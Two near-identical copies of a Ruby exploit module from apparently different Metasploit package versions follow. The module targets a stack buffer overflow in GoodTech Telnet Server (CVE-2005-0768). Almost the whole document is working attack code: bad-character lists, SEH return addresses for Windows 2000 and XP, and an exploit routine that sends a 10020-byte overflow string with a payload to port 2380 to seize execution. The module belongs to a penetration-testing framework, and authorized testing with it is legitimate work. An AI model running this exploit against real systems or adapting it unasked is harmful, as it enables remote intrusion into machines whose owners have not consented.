==> metasploit-6.4.54-2-x86_64.pkg.tar.zst: opt/metasploit/modules/exploits/windows/telnet/goodtech_telnet.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GoodTech Telnet Server Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in GoodTech Systems Telnet Server
          versions prior to 5.0.7. By sending an overly long string, an attacker can
          overwrite the buffer and control program execution.
        },
        'License' => MSF_LICENSE,
        'Author' => 'MC',
        'References' =>
          [
            [ 'CVE', '2005-0768' ],
            [ 'OSVDB', '14806'],
            [ 'BID', '12815' ],
          ],
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'thread'
          },
        'Payload' =>
          {
            'Space' => 400,
            'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
            'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44"
          },
        'Platform' => 'win',
        'Targets' =>
          [
            [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],
            [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
          ],
        'Privileged' => true,
        'DisclosureDate' => '2005-03-15',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        Opt::RPORT(2380)
      ]
    )
  end

  def exploit
    connect

    sploit = rand_text_english(10020, payload_badchars)
    seh = generate_seh_payload(target.ret)

    sploit[10012, seh.length] = seh

    print_status("Trying target #{target.name}...")

    sock.put(sploit + "\r\n\r\n")

    handler
    disconnect
  end
end

==> metasploit-6.4.92-1-x86_64.pkg.tar.zst: opt/metasploit/modules/exploits/windows/telnet/goodtech_telnet.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GoodTech Telnet Server Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in GoodTech Systems Telnet Server
          versions prior to 5.0.7. By sending an overly long string, an attacker can
          overwrite the buffer and control program execution.
        },
        'License' => MSF_LICENSE,
        'Author' => 'MC',
        'References' => [
          [ 'CVE', '2005-0768' ],
          [ 'OSVDB', '14806'],
          [ 'BID', '12815' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Payload' => {
          'Space' => 400,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44"
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],
          [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
        ],
        'Privileged' => true,
        'DisclosureDate' => '2005-03-15',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(2380)
      ]
    )
  end

  def exploit
    connect

    sploit = rand_text_english(10020, payload_badchars)
    seh = generate_seh_payload(target.ret)

    sploit[10012, seh.length] = seh

    print_status("Trying target #{target.name}...")

    sock.put(sploit + "\r\n\r\n")

    handler
    disconnect
  end
end
